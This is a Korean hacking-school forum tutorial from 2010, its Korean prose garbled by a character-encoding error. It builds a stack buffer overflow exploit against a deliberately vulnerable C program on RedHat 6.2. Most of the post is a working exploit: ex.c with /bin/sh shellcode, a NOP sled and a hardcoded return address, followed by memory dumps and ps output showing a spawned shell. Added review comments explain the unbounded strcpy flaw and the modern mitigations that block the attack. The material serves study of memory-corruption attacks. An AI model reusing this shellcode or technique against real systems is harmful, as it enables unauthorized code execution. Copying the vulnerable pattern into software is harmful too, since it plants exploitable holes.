   buff3r
   http://#include .
   [자작]RedHat 6.2 환경에서 BOF exploit 만들기 -The Second -

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1438 [º¹»ç]


Àú¹ø¿¡ ¸¸µé¾ú´ø ÀͽºÇ÷ÎÀÕÀº Ãë¾àÇÑ ÇÁ·Î±×·¥ ³»ºÎ ¹öÆ۾ȿ¡¼­
¸ðµçÀÏÀ» ³¡³Â½À´Ï´Ù. À̹ø¿¡´Â buf ¿¡ 4¹ÙÀÌÆ® ¸¸À» ÇÒ´çÇÏ´Â ÇÁ·Î±×·¥À» ÀͽºÇ÷ÎÀÕ
Çغ¸µµ·Ï ÇÏ°Ú½À´Ï´Ù
vuln.c
#include <stdio.h>
#include "dumpcode.h"
int main(int argc,char *argv[])
{
        char buf[4];  // Only 4 bytes are allocated.
                                 // Stack layout: [buf(4)][sfp(4)][ret(4)]
                                 // So only 8 bytes are available in front of the saved return address.
                                 // The method from the previous article therefore cannot be used as-is.
                                 //
                                 // NOTE(review): this is the deliberate defect the article studies.
                                 // strcpy() copies argv[1] with no length bound, so any argument of
                                 // 4 or more characters (plus its NUL) writes past buf into sfp/ret.
                                 // argc is never checked, so running with no argument passes a NULL
                                 // argv[1] to strcpy(). A hardened version would reject argc < 2 and
                                 // bound the copy, e.g. snprintf(buf, sizeof buf, "%s", argv[1]).
                                 // strcpy() is used without <string.h> (implicit declaration).
        strcpy(buf,argv[1]);
        dumpcode(buf,500);  // from the local dumpcode.h; given buf and 500 - the output below
                            // shows it printing a hex dump of 500 bytes starting at buf, i.e. far
                            // past the 4-byte array.
}

±×·¸´Ù¸é ¾î¶»°Ô °ø°ÝÀ» ¼º°ø½ÃÄÑ¾ß ÇÒ±î¿ä . ? ¹æ¹ýÀº µÎ°¡Áö°¡ ÀÖ½À´Ï´Ù.
1. ȯ°æº¯¼ö¸¦ ÀÌ¿ëÇÑ exploit
2. NOP À» ÀÌ¿ëÇÑ exploit
(RTL Àº ÀÏ´Ü »¯½À´Ï´Ù .. ¤»¤»)
À̹ø °­Á¿¡¼­´Â 2¹ø° ¹æ¹ýÀ» ÀÌ¿ëÇÏ°Ú½À´Ï´Ù.
8¹ÙÀÌÆ® ¹Û¿¡ ¾ø´Âµ¥ ¾î¶»°Ô NOPÀ» ³Ö³Ä±¸¿ä ??
¹æ¹ýÀº °£´ÜÇÕ´Ï´Ù. ret µÚ¿¡ NOP °ú ½©Äڵ带 ³Ö¾îÁØÈÄ, ret´Â NOPÁß ¾Æ¹«°÷À̳ª
°¡¸£Å°°Ô ÇϸéµË´Ï´Ù.
°ø°ÝÇÒ ½ºÅñ¸Á¶:
[¾²·¹±â°ª ( 8Byte ) ][ RET ( 8Bye ] [ NOP x 200 ( 200byte) ] [Shellcode ]
                            --------------               ¡è
                                    ¡é                      ¡è
                                    ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ¡æ

ÀÌ·±½ÄÀ¸·Î ±¸¼ºÇÏ¸é µË´Ï´Ù.
ÀÏ´Ü ret µÚ¿¡ NOPÀÌ PUSH µÉ ÁÖ¼Ò¸¦ ã¾Æº¾½Ã´Ù.
[test@localhost test]$ ./vuln `perl -e 'print "\x90"x600'`
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9b4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9c4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9d4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa04  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa44  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa54  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa64  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa74  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa84  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa94  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaa4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffab4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffac4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffad4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffae4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaf4  90 90 90 90                    

°ø°£ÀÌ Âü ¹«±Ã¹«Áø Çϱº¿ä +-+
¿ì¸®´Â 0xbffff924 ¸¦ ÀÌ¿ëÇսô٠.
ex.c
#include <stdlib.h>
// Machine-code payload for the i386 RedHat 6.2 target the article describes.
// Kept as a C string because main() below sizes it with strlen() and copies it
// byte by byte; strlen() stops at the first 0x00 byte, so the measured length is
// only the bytes up to that point.
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // This Is Shellcode
/*
 * Builds the 600-byte argument described in the article and runs ./vuln with it.
 * Resulting layout (confirmed by the dumpcode output further down the page):
 * 8 filler bytes, the saved return address replaced by ret, 200 NOPs, the
 * payload, then ret repeated up to the terminating NUL.
 *
 * NOTE(review): ret is a fixed stack address read off the earlier NOP dump, so
 * the whole approach presupposes a predictable, executable stack with no
 * canary - precisely what ASLR, NX/W^X stacks and stack protectors remove on
 * any current distribution. It is a period piece for RedHat 6.2 on i386.
 */
int main(int argc, char *argv[])
{
        int i, offset;             // offset is declared but never used
        long esp, ret, *addr_ptr;  // esp is declared but never used
        char *buffer, *ptr;
        ret = 0xbffff924;  // the RET value we will use (taken from the NOP dump above)
        buffer = malloc(600);  // NOTE(review): the malloc() result is not checked for NULL
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }  // fill all 600 bytes with ret. The 4-byte step matches a
                                  // 4-byte long (the 32-bit target); on an LP64 system this loop
                                  // would write 1200 bytes into the 600-byte allocation.
        for(i=0; i < 8; i++)
        { buffer[i] = '\x41'; } // the first 8 bytes become \x41 ('A') filler
        ptr = buffer + 12; // the stack image is [A x 8 (8byte)][RET (4byte)], so
                                 // the NOPs start right after ret, at buffer + 12
        for(i=0; i < 200; i++)
        { *(ptr++) = '\x90'; }   // write the NOPs
        ptr = buffer + 212; // where the payload is placed
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }   // copy the payload in after RET and the NOPs.
                                       // strlen() and execl() are used without <string.h> /
                                       // <unistd.h> - implicit declarations, rejected by C99+.

        buffer[600-1] = 0;        // NUL-terminate so the buffer is a valid C string for execl()
        execl("./vuln", "vuln", buffer, 0);                      // run; on success the process image is
                                                                 // replaced and nothing below executes
        free(buffer);   // reached only if execl() fails
        return 0;
}
°ø°ÝÇϱâÀü :
[test@localhost test]$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  741 pts/0    00:00:00 ps

°ø°Ý :
[test@localhost test]$ ./ex
0xbffff8d4  41 41 41 41 41 41 41 41 24 f9 ff bf 90 90 90 90   AAAAAAAA$.......
0xbffff8e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff8f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 31 c0 b0 46 31 db 31 c9 cd 80 eb 16   ....1..F1.1.....
0xbffff9b4  5b 31 c0 88 43 07 89 5b 08 89 43 0c b0 0b 8d 4b   [1..C..[..C....K
0xbffff9c4  08 8d 53 0c cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f   ..S......../bin/
0xbffff9d4  73 68 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   sh..$...$...$...
0xbffff9e4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffff9f4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa04  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa14  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa24  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa34  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa44  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa54  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa64  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa74  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa84  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa94  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffaa4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffab4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffac4  24 f9 ff bf                                       $...
bash$
°ø°Ý ÇÏ°í³­ ÈÄ :
bash$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  739 pts/0    00:00:00 sh // °ø°ÝÀÌ ¼º°øÇߴٴ°ÍÀ» ¾Ë¼öÀÖ´Ù
  740 pts/0    00:00:00 ps


  Hit : 7780     Date : 2010/03/18 06:55



    
º°ºûÀ»´ã¾Æ ¿©·¯ºÐÀº Áö±Ý buff3r°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°í ÀÖ´Â ±¤°æÀ» º¸°í °è½Ê´Ï´Ù.

¿©Æ° ¼±´ñ±Û ÈÄ°¨»ó
2010/03/18  
ÃÊÄÝ·¿³ªÀÎ ¹öÆÛ°¡ ¹öÆÛ¸¦ °¡Áö°í ³î°íÀÖ´Â ±¤°æ¤»¤»¤» 2010/03/18  
kjwon15 NOP À» °¡Áö°í ³ë´Â ±¤°æÀ̱º¿ä.. 2010/03/23  
zzguswhd ¾î¶².. ÄÄÆÄÀÏ·¯¸¦ ¾´°Å¿¡¿ä ?; 2010/07/26  
Cpgroot ÁÁÀºÁ¤º¸ µè°í°¨ ..¤·¤µ¤· 2010/08/18  
